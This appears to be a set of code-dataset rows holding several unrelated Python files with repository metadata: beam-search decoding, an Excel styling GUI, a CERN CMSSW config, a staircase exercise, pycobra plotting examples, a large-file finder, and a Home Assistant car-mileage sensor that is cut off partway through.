for bi in range(batch_size) ] final_ans = [] for i in range(max_len): curr_actives = [b for b in batch_results if not b.done] if len(curr_actives) == 0: break b_tgt_list = [b.get_curr_tgt() for b in curr_actives] b_tgt = torch.cat(b_tgt_list, dim=0) b_tgt_mask = make_std_mask(b_tgt, pad_idx) b_cand_size_list = [b.get_curr_candidate_size() for b in curr_actives] b_enc_list = [] for tup in enc_list: mem, mask = tup b_mem = torch.cat([mem[b.idx_in_batch, :, :].unsqueeze(0).repeat(b.get_curr_candidate_size(), 1, 1) for b in curr_actives], dim=0) b_mask = None if mask is not None: b_mask = torch.cat([mask[b.idx_in_batch, :, :].unsqueeze(0).repeat(b.get_curr_candidate_size(), 1, 1) for b in curr_actives], dim=0) b_enc_list.append((b_mem, b_mask)) dec_out = model.decode(b_tgt, b_tgt_mask, b_enc_list) gen_wid_probs, _, _ = model.predict(dec_out) beam_i = 0 for bi, size in enumerate(b_cand_size_list): g_probs = gen_wid_probs[beam_i:beam_i + size, :].view(size, -1, gen_wid_probs.size(-1)) vt, it = g_probs.topk(beam_width) next_vals, next_wids, next_words = [], [], [] for ci in range(size): vals, wis, words = [], [], [] for idx in range(beam_width): vals.append(vt[ci, 0, idx].item()) wi = it[ci, 0, idx].item() word = i2w[wi] wis.append(wi) words.append(word) next_vals.append(vals) next_wids.append(wis) next_words.append(words) curr_actives[bi].update(g_probs, next_vals, next_wids, next_words) beam_i += size for b in batch_results: final_ans += b.collect_results(topk=topk) return final_ans
28,108
1,790
1,263
fbbd84be295788a69019c863fff3289b27d4892b
4,707
py
Python
main.py
mode9/xlsxstyle
6311c6088672d6a39555bd735e1b443583692289
[ "MIT" ]
null
null
null
main.py
mode9/xlsxstyle
6311c6088672d6a39555bd735e1b443583692289
[ "MIT" ]
null
null
null
main.py
mode9/xlsxstyle
6311c6088672d6a39555bd735e1b443583692289
[ "MIT" ]
null
null
null
# This Python file uses the following encoding: utf-8 import os import sys import time from PyQt5 import QtCore from PySide2.QtCore import QFile from PySide2.QtUiTools import QUiLoader from PySide2.QtWidgets import QApplication, QWidget, QFileDialog, \ QPushButton, QLineEdit, QMessageBox, QTextBrowser, QProgressBar from openpyxl import Workbook from threads import CreateThread, ProgressThread from workers import Worker if __name__ == "__main__": app = QApplication([sys.executable]) widget = XlsxStyler() widget.show() sys.exit(app.exec_())
39.554622
104
0.670066
# This Python file uses the following encoding: utf-8 import os import sys import time from PyQt5 import QtCore from PySide2.QtCore import QFile from PySide2.QtUiTools import QUiLoader from PySide2.QtWidgets import QApplication, QWidget, QFileDialog, \ QPushButton, QLineEdit, QMessageBox, QTextBrowser, QProgressBar from openpyxl import Workbook from threads import CreateThread, ProgressThread from workers import Worker class XlsxStyler(QWidget): def __init__(self): super(XlsxStyler, self).__init__() self.load_ui() self.org_button: QPushButton = self.findChild(QPushButton, "org_button") self.target_button: QPushButton = self.findChild(QPushButton, "target_button") self.create_button: QPushButton = self.findChild(QPushButton, "create_button") self.org_edit: QLineEdit = self.findChild(QLineEdit, "org_edit") self.target_edit: QLineEdit = self.findChild(QLineEdit, "target_edit") self.text_browser: QTextBrowser = self.findChild(QTextBrowser, "textBrowser") self.pg_bar: QProgressBar = self.findChild(QProgressBar, "progressBar") self.pg_thread = ProgressThread(self.pg_bar) # self.pg_thread.change_value.connect(self._set_pg_range) self.pg_thread.start() self.org_button.clicked.connect(self.org_dialog) self.target_button.clicked.connect(self.target_dialog) self.create_button.clicked.connect(self.createExcel) self.org_name = '' self.target_name = '' self.org_wb = None self.target_wb = None def load_ui(self): loader = QUiLoader() path = os.path.join(os.path.dirname(__file__), "form.ui") ui_file = QFile(path) ui_file.open(QFile.ReadOnly) loader.load(ui_file, self) ui_file.close() def _set_edit_text(self, target: str, text: str) -> None: getattr(self, f'{target}_edit').setText(text) def _set_workbook(self, target: str, wb: Workbook) -> None: setattr(self, f'{target}_wb', wb) self.create_button.setDisabled(False) def set_org_wb(self, wb): self._set_workbook(target='org', wb=wb) def set_target_wb(self, wb): self._set_workbook(target='target', wb=wb) def _open_dialog(self, target: str): wb_callback = getattr(self, f"set_{target}_wb") name = QFileDialog.getOpenFileName(self, 'Open file', './')[0] if not name: return elif name.split(".")[-1] not in ("xlsx", "xlsm", "xlsb", "xls"): QMessageBox.critical(self, 'error', '엑셀 파일이 아닙니다.') return self.create_button.setDisabled(True) self.pg_thread.toggle_status() setattr(self, f'{target}_thread', QtCore.QThread()) setattr(self, f'{target}_worker', Worker(name, self.text_browser)) worker: Worker = getattr(self, f'{target}_worker') thread: QtCore.QThread = getattr(self, f'{target}_thread') worker.moveToThread(thread) thread.started.connect(worker.run) worker.finished.connect(thread.quit) worker.finished.connect(self.pg_thread.toggle_status) worker.failed.connect(lambda: QMessageBox.critical(self, 'error', '해당 파일이 존재하지 않거나 잘못된 파일입니다.')) worker.workbook.connect(wb_callback) worker.finished.connect(worker.deleteLater) thread.finished.connect(thread.deleteLater) thread.start() self._set_edit_text(target, name) setattr(self, f"{target}_name", name) def org_dialog(self) -> None: self._open_dialog('org') def target_dialog(self) -> None: self._open_dialog('target') def createExcel(self) -> None: if not self.org_name or not self.target_name: QMessageBox.critical(self, 'error', '파일을 선택해주세요.') return self.create_button.setDisabled(True) self.text_browser.insertPlainText("INFO: 파일 생성 작업 시작\n") start = time.time() self.create_thread = CreateThread(self.org_wb, self.target_wb, self.text_browser) self.create_thread.started.connect(self.pg_thread.toggle_status) self.create_thread.finished.connect(lambda: self.insert_text( f"******** 총 작업시간: {round(time.time() - start, 2)}초 ********\n" )) self.create_thread.finished.connect(self.pg_thread.toggle_status) self.create_thread.finished.connect(lambda: self.create_button.setDisabled(False)) self.create_thread.start() def insert_text(self, text: str): self.text_browser.insertPlainText(text) if __name__ == "__main__": app = QApplication([sys.executable]) widget = XlsxStyler() widget.show() sys.exit(app.exec_())
3,917
5
319
22fa8e5db0048c1973b20aac2f2d4320e6b5679e
2,812
py
Python
CalibTracker/SiPixelQuality/test/step3_SiPixelStatusAlCaRecoProducer.py
nistefan/cmssw
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
[ "Apache-2.0" ]
1
2019-08-09T08:42:11.000Z
2019-08-09T08:42:11.000Z
CalibTracker/SiPixelQuality/test/step3_SiPixelStatusAlCaRecoProducer.py
nistefan/cmssw
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
[ "Apache-2.0" ]
null
null
null
CalibTracker/SiPixelQuality/test/step3_SiPixelStatusAlCaRecoProducer.py
nistefan/cmssw
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
[ "Apache-2.0" ]
1
2020-01-10T13:36:46.000Z
2020-01-10T13:36:46.000Z
import os import FWCore.ParameterSet.Config as cms from Configuration.StandardSequences.Eras import eras process = cms.Process('PCL',eras.Run2_2017) # ---------------------------------------------------------------------- process.load("FWCore.MessageLogger.MessageLogger_cfi") process.MessageLogger.cerr.threshold = 'INFO' process.MessageLogger.cerr.FwkReport.reportEvery = 10000 process.MessageLogger.categories.append('HLTrigReport') process.MessageLogger.categories.append('L1GtTrigReport') process.options = cms.untracked.PSet( SkipEvent = cms.untracked.vstring('ProductNotFound'), wantSummary = cms.untracked.bool(True) ) # -- Conditions process.load("Configuration.StandardSequences.MagneticField_38T_cff") process.load("Configuration.StandardSequences.GeometryRecoDB_cff") process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff') from Configuration.AlCa.GlobalTag import GlobalTag process.GlobalTag = GlobalTag(process.GlobalTag, '92X_dataRun2_Express_v8', '') # -- Input files process.source = cms.Source( "PoolSource", fileNames = cms.untracked.vstring( "/store/express/Run2017F/ExpressPhysics/FEVT/Express-v1/000/305/366/00000/863EC350-6EB6-E711-8EAD-02163E019B61.root", "/store/express/Run2017F/ExpressPhysics/FEVT/Express-v1/000/305/366/00000/B6268B1F-6FB6-E711-A46C-02163E01439D.root", ), #lumisToProcess = cms.untracked.VLuminosityBlockRange("305366:1-305366:1"), ) # -- number of events process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) ) from EventFilter.SiPixelRawToDigi.SiPixelRawToDigi_cfi import siPixelDigis process.siPixelDigis = siPixelDigis.clone() process.siPixelDigis.InputLabel = cms.InputTag("rawDataCollector") process.siPixelStatusProducer = cms.EDProducer("SiPixelStatusProducer", SiPixelStatusProducerParameters = cms.PSet( badPixelFEDChannelCollections = cms.VInputTag(cms.InputTag('siPixelDigis')), pixelClusterLabel = cms.untracked.InputTag("siPixelClusters::RECO"), monitorOnDoubleColumn = cms.untracked.bool(False), resetEveryNLumi = cms.untracked.int32( 1 ) ) ) process.ALCARECOStreamSiPixelCalZeroBias = cms.OutputModule("PoolOutputModule", fileName = cms.untracked.string('SiPixelCalZeroBias.root'), outputCommands = cms.untracked.vstring('drop *', 'keep *_siPixelStatusProducer_*_*', ) ) process.p = cms.Path(process.siPixelDigis*process.siPixelStatusProducer) process.end = cms.EndPath(process.ALCARECOStreamSiPixelCalZeroBias) process.schedule = cms.Schedule(process.p,process.end) # Add early deletion of temporary data products to reduce peak memory need from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete process = customiseEarlyDelete(process) # End adding early deletion
39.605634
121
0.771693
import os import FWCore.ParameterSet.Config as cms from Configuration.StandardSequences.Eras import eras process = cms.Process('PCL',eras.Run2_2017) # ---------------------------------------------------------------------- process.load("FWCore.MessageLogger.MessageLogger_cfi") process.MessageLogger.cerr.threshold = 'INFO' process.MessageLogger.cerr.FwkReport.reportEvery = 10000 process.MessageLogger.categories.append('HLTrigReport') process.MessageLogger.categories.append('L1GtTrigReport') process.options = cms.untracked.PSet( SkipEvent = cms.untracked.vstring('ProductNotFound'), wantSummary = cms.untracked.bool(True) ) # -- Conditions process.load("Configuration.StandardSequences.MagneticField_38T_cff") process.load("Configuration.StandardSequences.GeometryRecoDB_cff") process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff') from Configuration.AlCa.GlobalTag import GlobalTag process.GlobalTag = GlobalTag(process.GlobalTag, '92X_dataRun2_Express_v8', '') # -- Input files process.source = cms.Source( "PoolSource", fileNames = cms.untracked.vstring( "/store/express/Run2017F/ExpressPhysics/FEVT/Express-v1/000/305/366/00000/863EC350-6EB6-E711-8EAD-02163E019B61.root", "/store/express/Run2017F/ExpressPhysics/FEVT/Express-v1/000/305/366/00000/B6268B1F-6FB6-E711-A46C-02163E01439D.root", ), #lumisToProcess = cms.untracked.VLuminosityBlockRange("305366:1-305366:1"), ) # -- number of events process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) ) from EventFilter.SiPixelRawToDigi.SiPixelRawToDigi_cfi import siPixelDigis process.siPixelDigis = siPixelDigis.clone() process.siPixelDigis.InputLabel = cms.InputTag("rawDataCollector") process.siPixelStatusProducer = cms.EDProducer("SiPixelStatusProducer", SiPixelStatusProducerParameters = cms.PSet( badPixelFEDChannelCollections = cms.VInputTag(cms.InputTag('siPixelDigis')), pixelClusterLabel = cms.untracked.InputTag("siPixelClusters::RECO"), monitorOnDoubleColumn = cms.untracked.bool(False), resetEveryNLumi = cms.untracked.int32( 1 ) ) ) process.ALCARECOStreamSiPixelCalZeroBias = cms.OutputModule("PoolOutputModule", fileName = cms.untracked.string('SiPixelCalZeroBias.root'), outputCommands = cms.untracked.vstring('drop *', 'keep *_siPixelStatusProducer_*_*', ) ) process.p = cms.Path(process.siPixelDigis*process.siPixelStatusProducer) process.end = cms.EndPath(process.ALCARECOStreamSiPixelCalZeroBias) process.schedule = cms.Schedule(process.p,process.end) # Add early deletion of temporary data products to reduce peak memory need from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete process = customiseEarlyDelete(process) # End adding early deletion
0
0
0
f82068383fbfa605535716b59dcbcbea370cb469
1,020
py
Python
Python/staircase.py
nickhaynes/HackerRank-Challenges
12be5518251ffde5d19f6ef42795e1c48b6623bd
[ "MIT" ]
null
null
null
Python/staircase.py
nickhaynes/HackerRank-Challenges
12be5518251ffde5d19f6ef42795e1c48b6623bd
[ "MIT" ]
null
null
null
Python/staircase.py
nickhaynes/HackerRank-Challenges
12be5518251ffde5d19f6ef42795e1c48b6623bd
[ "MIT" ]
null
null
null
# Consider a staircase of size : # # # # ## # ### # #### # # Observe that its base and height are both equal to , and the image is drawn using # symbols and spaces. The last line is not preceded by any spaces. # # Write a program that prints a staircase of size . # # Input Format # # A single integer, , denoting the size of the staircase. # # Output Format # # Print a staircase of size using # symbols and spaces. # # Note: The last line must have spaces in it. # # Sample Input # # 6 # Sample Output # # # # ## # ### # #### # ##### # ###### # # Explanation # # The staircase is right-aligned, composed of # symbols and spaces, and has a height and width of . # # #!/bin/python import math import os import random import re import sys # Complete the staircase function below. if __name__ == '__main__': n = int(raw_input()) staircase(n)
16.721311
150
0.590196
# Consider a staircase of size : # # # # ## # ### # #### # # Observe that its base and height are both equal to , and the image is drawn using # symbols and spaces. The last line is not preceded by any spaces. # # Write a program that prints a staircase of size . # # Input Format # # A single integer, , denoting the size of the staircase. # # Output Format # # Print a staircase of size using # symbols and spaces. # # Note: The last line must have spaces in it. # # Sample Input # # 6 # Sample Output # # # # ## # ### # #### # ##### # ###### # # Explanation # # The staircase is right-aligned, composed of # symbols and spaces, and has a height and width of . # # #!/bin/python import math import os import random import re import sys # Complete the staircase function below. def staircase(n): s=1 y=n-s for x in range (n): print (" " * y) + ("#" * s) s=s+1 y=y-1 if __name__ == '__main__': n = int(raw_input()) staircase(n)
102
0
22
0023e4346495fa3d50aeae59ada722870a812388
271
py
Python
Algorithm/coding_interviews/Python/sword-for-offer/64_sum_n.py
ck76/awesome-cs
48cba4081dc5290f07e305850b9a3a7e8a590b64
[ "Apache-2.0" ]
1
2021-11-16T13:37:41.000Z
2021-11-16T13:37:41.000Z
Algorithm/coding_interviews/Python/sword-for-offer/64_sum_n.py
ck76/awesome-cs
48cba4081dc5290f07e305850b9a3a7e8a590b64
[ "Apache-2.0" ]
null
null
null
Algorithm/coding_interviews/Python/sword-for-offer/64_sum_n.py
ck76/awesome-cs
48cba4081dc5290f07e305850b9a3a7e8a590b64
[ "Apache-2.0" ]
null
null
null
#! /usr/bin/python3 # -*- coding: utf-8 -*- # @Time : 2019/3/10 8:10 PM # @Author : xiaoliji # @Email : yutian9527@gmail.com """ 求1+...n, 不能用循环等。 >>> sum_solution(10) 55 """
15.941176
38
0.546125
#! /usr/bin/python3 # -*- coding: utf-8 -*- # @Time : 2019/3/10 8:10 PM # @Author : xiaoliji # @Email : yutian9527@gmail.com """ 求1+...n, 不能用循环等。 >>> sum_solution(10) 55 """ def sum_solution(n: int) -> int: return n and (n+sum_solution(n-1))
50
0
23
4336232382e90a34670de18f1e14b8984535e17e
4,799
py
Python
docs/plot_visualise.py
vishalbelsare/pycobra
2af4faa681b412b8508d3043ccaff8e98c1d4368
[ "MIT" ]
119
2017-03-26T12:11:52.000Z
2022-03-20T15:17:46.000Z
docs/plot_visualise.py
chrinide/pycobra
2af4faa681b412b8508d3043ccaff8e98c1d4368
[ "MIT" ]
7
2017-03-27T12:08:37.000Z
2018-09-22T10:43:24.000Z
docs/plot_visualise.py
chrinide/pycobra
2af4faa681b412b8508d3043ccaff8e98c1d4368
[ "MIT" ]
22
2017-04-12T07:44:09.000Z
2022-01-13T06:35:29.000Z
""" COBRA Visualisations -------------------- This notebook will cover the visulaisation and plotting offered by pycobra. """ # %matplotlib inline import numpy as np from pycobra.cobra import Cobra from pycobra.ewa import Ewa from pycobra.visualisation import Visualisation from pycobra.diagnostics import Diagnostics # setting up our random data-set rng = np.random.RandomState(42) # D1 = train machines; D2 = create COBRA; D3 = calibrate epsilon, alpha; D4 = testing n_features = 2 D1, D2, D3, D4 = 200, 200, 200, 200 D = D1 + D2 + D3 + D4 X = rng.uniform(-1, 1, D * n_features).reshape(D, n_features) # Y = np.power(X[:,1], 2) + np.power(X[:,3], 3) + np.exp(X[:,10]) Y = np.power(X[:,0], 2) + np.power(X[:,1], 3) # training data-set X_train = X[:D1 + D2] X_test = X[D1 + D2 + D3:D1 + D2 + D3 + D4] X_eps = X[D1 + D2:D1 + D2 + D3] # for testing Y_train = Y[:D1 + D2] Y_test = Y[D1 + D2 + D3:D1 + D2 + D3 + D4] Y_eps = Y[D1 + D2:D1 + D2 + D3] # set up our COBRA machine with the data cobra = Cobra(epsilon=0.5) cobra.fit(X_train, Y_train) ###################################################################### # Plotting COBRA # ~~~~~~~~~~~~~~ # # We use the visualisation class to plot our results, and for various # visualisations. # cobra_vis = Visualisation(cobra, X_test, Y_test) # to plot our machines, we need a linspace as input. This is the 'scale' to plot and should be the range of the results # since our data ranges from -1 to 1 it is such - and we space it out to a hundred points cobra_vis.plot_machines(machines=["COBRA"]) cobra_vis.plot_machines() ###################################################################### # Plots and Visualisations of Results # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # QQ and Boxplots! # cobra_vis.QQ() cobra_vis.boxplot() ###################################################################### # Plotting EWA! # ~~~~~~~~~~~~~ # # We can use the same visualisation class for seeing how EWA works. Let's # demonstrate this! # ewa = Ewa() ewa.set_beta(X_beta=X_eps, y_beta=Y_eps) ewa.fit(X_train, Y_train) ewa_vis = Visualisation(ewa, X_test, Y_test) ewa_vis.QQ("EWA") ewa_vis.boxplot() ###################################################################### # Plotting ClassifierCobra # ~~~~~~~~~~~~~~~~~~~~~~~~ # from sklearn import datasets from sklearn.metrics import accuracy_score from pycobra.classifiercobra import ClassifierCobra bc = datasets.load_breast_cancer() X_cc = bc.data[:-40] y_cc = bc.target[:-40] X_cc_test = bc.data[-40:] y_cc_test = bc.target[-40:] cc = ClassifierCobra() cc.fit(X_cc, y_cc) cc_vis = Visualisation(cc, X_cc_test, y_cc_test) cc_vis.boxplot() ###################################################################### # Remember that all the estimators in the Pycobra package are scikit-learn # compatible - we can also use the scikit-learn metrics and tools to # analyse our machines! # from sklearn.metrics import classification_report print(classification_report(y_cc_test, cc.predict(X_cc_test))) ###################################################################### # Plotting COBRA colors! # ~~~~~~~~~~~~~~~~~~~~~~ # # We're now going to experiment with plotting colors and data. After we # get information about which indices are used by which machines the best # for a fixed epsilon (or not, we can toggle this option), we can plot the # distribution of machines. # # Why is this useful? Since we're dealing with a 2-D space now, we're # attempting to see if there are some parts in the input space which are # picked up by certain machines. This could lead to interesting # experiments and # # We first present a plot where the machine colors are mixed depending on # which machines were selected; after which we plot one machine at a time. # indices, MSE = cobra_vis.indice_info(X_test=X_eps[0:50], y_test=Y_eps[0:50], epsilon=0.50) cobra_vis.color_cobra(X_test=X_eps[0:50], indice_info=indices, single=True) cobra_vis.color_cobra(X_test=X_eps[0:50], indice_info=indices) ###################################################################### # Voronoi Tesselation # ~~~~~~~~~~~~~~~~~~~ # # We present a variety of Voronoi Tesselation based plots - the purpose of # this is to help in visualising the pattern of points which tend to be # picked up. # cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices, single=True) cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices) ###################################################################### # Gradient-Colored Based Voronoi # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices, MSE=MSE, gradient=True) ###################################################################### # Licensed under the MIT License - https://opensource.org/licenses/MIT #
27.739884
119
0.604501
""" COBRA Visualisations -------------------- This notebook will cover the visulaisation and plotting offered by pycobra. """ # %matplotlib inline import numpy as np from pycobra.cobra import Cobra from pycobra.ewa import Ewa from pycobra.visualisation import Visualisation from pycobra.diagnostics import Diagnostics # setting up our random data-set rng = np.random.RandomState(42) # D1 = train machines; D2 = create COBRA; D3 = calibrate epsilon, alpha; D4 = testing n_features = 2 D1, D2, D3, D4 = 200, 200, 200, 200 D = D1 + D2 + D3 + D4 X = rng.uniform(-1, 1, D * n_features).reshape(D, n_features) # Y = np.power(X[:,1], 2) + np.power(X[:,3], 3) + np.exp(X[:,10]) Y = np.power(X[:,0], 2) + np.power(X[:,1], 3) # training data-set X_train = X[:D1 + D2] X_test = X[D1 + D2 + D3:D1 + D2 + D3 + D4] X_eps = X[D1 + D2:D1 + D2 + D3] # for testing Y_train = Y[:D1 + D2] Y_test = Y[D1 + D2 + D3:D1 + D2 + D3 + D4] Y_eps = Y[D1 + D2:D1 + D2 + D3] # set up our COBRA machine with the data cobra = Cobra(epsilon=0.5) cobra.fit(X_train, Y_train) ###################################################################### # Plotting COBRA # ~~~~~~~~~~~~~~ # # We use the visualisation class to plot our results, and for various # visualisations. # cobra_vis = Visualisation(cobra, X_test, Y_test) # to plot our machines, we need a linspace as input. This is the 'scale' to plot and should be the range of the results # since our data ranges from -1 to 1 it is such - and we space it out to a hundred points cobra_vis.plot_machines(machines=["COBRA"]) cobra_vis.plot_machines() ###################################################################### # Plots and Visualisations of Results # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # QQ and Boxplots! # cobra_vis.QQ() cobra_vis.boxplot() ###################################################################### # Plotting EWA! # ~~~~~~~~~~~~~ # # We can use the same visualisation class for seeing how EWA works. Let's # demonstrate this! # ewa = Ewa() ewa.set_beta(X_beta=X_eps, y_beta=Y_eps) ewa.fit(X_train, Y_train) ewa_vis = Visualisation(ewa, X_test, Y_test) ewa_vis.QQ("EWA") ewa_vis.boxplot() ###################################################################### # Plotting ClassifierCobra # ~~~~~~~~~~~~~~~~~~~~~~~~ # from sklearn import datasets from sklearn.metrics import accuracy_score from pycobra.classifiercobra import ClassifierCobra bc = datasets.load_breast_cancer() X_cc = bc.data[:-40] y_cc = bc.target[:-40] X_cc_test = bc.data[-40:] y_cc_test = bc.target[-40:] cc = ClassifierCobra() cc.fit(X_cc, y_cc) cc_vis = Visualisation(cc, X_cc_test, y_cc_test) cc_vis.boxplot() ###################################################################### # Remember that all the estimators in the Pycobra package are scikit-learn # compatible - we can also use the scikit-learn metrics and tools to # analyse our machines! # from sklearn.metrics import classification_report print(classification_report(y_cc_test, cc.predict(X_cc_test))) ###################################################################### # Plotting COBRA colors! # ~~~~~~~~~~~~~~~~~~~~~~ # # We're now going to experiment with plotting colors and data. After we # get information about which indices are used by which machines the best # for a fixed epsilon (or not, we can toggle this option), we can plot the # distribution of machines. # # Why is this useful? Since we're dealing with a 2-D space now, we're # attempting to see if there are some parts in the input space which are # picked up by certain machines. This could lead to interesting # experiments and # # We first present a plot where the machine colors are mixed depending on # which machines were selected; after which we plot one machine at a time. # indices, MSE = cobra_vis.indice_info(X_test=X_eps[0:50], y_test=Y_eps[0:50], epsilon=0.50) cobra_vis.color_cobra(X_test=X_eps[0:50], indice_info=indices, single=True) cobra_vis.color_cobra(X_test=X_eps[0:50], indice_info=indices) ###################################################################### # Voronoi Tesselation # ~~~~~~~~~~~~~~~~~~~ # # We present a variety of Voronoi Tesselation based plots - the purpose of # this is to help in visualising the pattern of points which tend to be # picked up. # cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices, single=True) cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices) ###################################################################### # Gradient-Colored Based Voronoi # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices, MSE=MSE, gradient=True) ###################################################################### # Licensed under the MIT License - https://opensource.org/licenses/MIT #
0
0
0
5eae38782b76e9b037188eec504064586659d814
384
py
Python
app/__init__.py
xujl930/crawl_metro
99c52f183fbf52a43847d98c2d0e666197a73287
[ "MIT" ]
null
null
null
app/__init__.py
xujl930/crawl_metro
99c52f183fbf52a43847d98c2d0e666197a73287
[ "MIT" ]
null
null
null
app/__init__.py
xujl930/crawl_metro
99c52f183fbf52a43847d98c2d0e666197a73287
[ "MIT" ]
null
null
null
# -*- coding:utf8 -*- from flask import Flask from flask_mongoengine import MongoEngine from config import config db = MongoEngine()
21.333333
60
0.739583
# -*- coding:utf8 -*- from flask import Flask from flask_mongoengine import MongoEngine from config import config db = MongoEngine() def create_app(config_name): app = Flask(__name__) app.config.from_object(config[config_name]) db.init_app(app) from .api_0_1 import api as api_blueprint app.register_blueprint(api_blueprint, url_prefix='/api') return app
227
0
23
e0f740a7c9719c8085d1dc80c3e3e99aaf3c64b3
2,120
py
Python
practice projects/chap 09/delete unneeded files chap 9/delete unneeded files.py
alperpaksoy/automatetheboringstuff
6bdb7297c25e2c6588accaea00abcac6872f6df2
[ "MIT" ]
null
null
null
practice projects/chap 09/delete unneeded files chap 9/delete unneeded files.py
alperpaksoy/automatetheboringstuff
6bdb7297c25e2c6588accaea00abcac6872f6df2
[ "MIT" ]
null
null
null
practice projects/chap 09/delete unneeded files chap 9/delete unneeded files.py
alperpaksoy/automatetheboringstuff
6bdb7297c25e2c6588accaea00abcac6872f6df2
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # This program finds files that are above a specified size within # a specified folder and its subfolders ''' Write a program that walks through a folder tree and searches for exceptionally large files or folders—say, ones that have a file size of more than 100MB. (Remember, to get a file’s size, you can use os.path.getsize() from the os module.) Print these files with their absolute path to the screen. ''' import os import shutil import sys # converts byte to megabytes # Confirm existence of the specified folder sourceFolder = './source' sourceFolder = os.path.abspath(sourceFolder) # simpleSourceFolder = re.search(r'/([\w .-]+)$',sourceFolder).group(1) tSize = 0.5 * 1024 * 1024 # 0.5 MB if os.path.exists(sourceFolder): print('\nWill scan for files with more than {0:.2} MB in size in'.\ format(mb(tSize))) print(sourceFolder) else: print('Source folder %s does not exist.' % (sourceFolder)) sys.exit() count = 0 # number of files scanned countAbove = 0 # number of files found above the threshold size = 0 # number of files sizeAbove = 0 # total size of files found in MB # Walk through the specified folder # while finding the locations of files above a certain size # and printing out their paths. for foldername, subfolders, filenames in os.walk(sourceFolder): print('\nExamining "{0}" for large files...'.\ format(os.path.basename(foldername))) for filename in filenames: count += 1 fileSize = os.path.getsize(os.path.join(foldername, filename)) size += fileSize if fileSize >= tSize: print('Found: "{0}", {1:.2} MB'.format(filename,\ mb(fileSize))) countAbove += 1 sizeAbove += fileSize print('\nReviewed {0} files with'\ ' a total size of {1:,} MB.'.format(count,\ int(mb(size)))) print('Found {0} of them to be above {1:.2} MB '\ 'with a total size of {2} MB.'.\ format(countAbove, tSize / (1024 * 1024), int(mb(sizeAbove))))
32.615385
71
0.651887
#!/usr/bin/env python3 # This program finds files that are above a specified size within # a specified folder and its subfolders ''' Write a program that walks through a folder tree and searches for exceptionally large files or folders—say, ones that have a file size of more than 100MB. (Remember, to get a file’s size, you can use os.path.getsize() from the os module.) Print these files with their absolute path to the screen. ''' import os import shutil import sys # converts byte to megabytes def mb (size): return size / (1024 * 1024) # Confirm existence of the specified folder sourceFolder = './source' sourceFolder = os.path.abspath(sourceFolder) # simpleSourceFolder = re.search(r'/([\w .-]+)$',sourceFolder).group(1) tSize = 0.5 * 1024 * 1024 # 0.5 MB if os.path.exists(sourceFolder): print('\nWill scan for files with more than {0:.2} MB in size in'.\ format(mb(tSize))) print(sourceFolder) else: print('Source folder %s does not exist.' % (sourceFolder)) sys.exit() count = 0 # number of files scanned countAbove = 0 # number of files found above the threshold size = 0 # number of files sizeAbove = 0 # total size of files found in MB # Walk through the specified folder # while finding the locations of files above a certain size # and printing out their paths. for foldername, subfolders, filenames in os.walk(sourceFolder): print('\nExamining "{0}" for large files...'.\ format(os.path.basename(foldername))) for filename in filenames: count += 1 fileSize = os.path.getsize(os.path.join(foldername, filename)) size += fileSize if fileSize >= tSize: print('Found: "{0}", {1:.2} MB'.format(filename,\ mb(fileSize))) countAbove += 1 sizeAbove += fileSize print('\nReviewed {0} files with'\ ' a total size of {1:,} MB.'.format(count,\ int(mb(size)))) print('Found {0} of them to be above {1:.2} MB '\ 'with a total size of {2} MB.'.\ format(countAbove, tSize / (1024 * 1024), int(mb(sizeAbove))))
25
0
22
abbcc95a49709a058b3c9645b94868fe5c4bb1f5
7,973
py
Python
custom_components/sensor/car_milage_per_month.py
mar-schmidt/home-assistant-sensor-car-milage
b329b0e1fb26f211d909c747624b502f51017de7
[ "MIT" ]
null
null
null
custom_components/sensor/car_milage_per_month.py
mar-schmidt/home-assistant-sensor-car-milage
b329b0e1fb26f211d909c747624b502f51017de7
[ "MIT" ]
null
null
null
custom_components/sensor/car_milage_per_month.py
mar-schmidt/home-assistant-sensor-car-milage
b329b0e1fb26f211d909c747624b502f51017de7
[ "MIT" ]
null
null
null
""" Configuration: To use the car_milage_per_month component you will need to add the following to your configuration.yaml file: car_milage_per_month: odometer_sensor: sensor.ete123_odometer (the sensor that holds the total amount of km) """ import json import logging import calendar import os import voluptuous as vol import homeassistant.helpers.config_validation as cv from datetime import datetime from homeassistant.const import ( CONF_NAME, CONF_UNIT_OF_MEASUREMENT, LENGTH_KILOMETERS, STATE_UNKNOWN ) from homeassistant.helpers.entity import Entity from homeassistant.components.sensor import PLATFORM_SCHEMA from homeassistant.core import HomeAssistant, CoreState _LOGGER = logging.getLogger(__name__) DEFAULT_NAME = 'car_milage_per_month' DOMAIN = 'car_milage_per_month' CONF_ODOMETER_SENSOR = 'odometer_sensor' PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ vol.Required(CONF_ODOMETER_SENSOR): cv.entity_id, vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string, vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string }) def setup_platform(hass, config, add_devices, discovery_info=None): """Setup the sensor platform.""" odometer_entity = config.get(CONF_ODOMETER_SENSOR) name = config.get(CONF_NAME) unit = config.get(CONF_UNIT_OF_MEASUREMENT) data = CarMilageData(hass, odometer_entity) add_devices([CarMilageSensor(hass, odometer_entity, name, unit, data)]) class CarMilageSensor(Entity): """Representation of a Sensor.""" def __init__(self, hass, odometer_entity, name, unit_of_measurement, data): """Initialize the sensor.""" self._hass = hass self._odometer_entity = odometer_entity self._name = name self._unit_of_measurement = 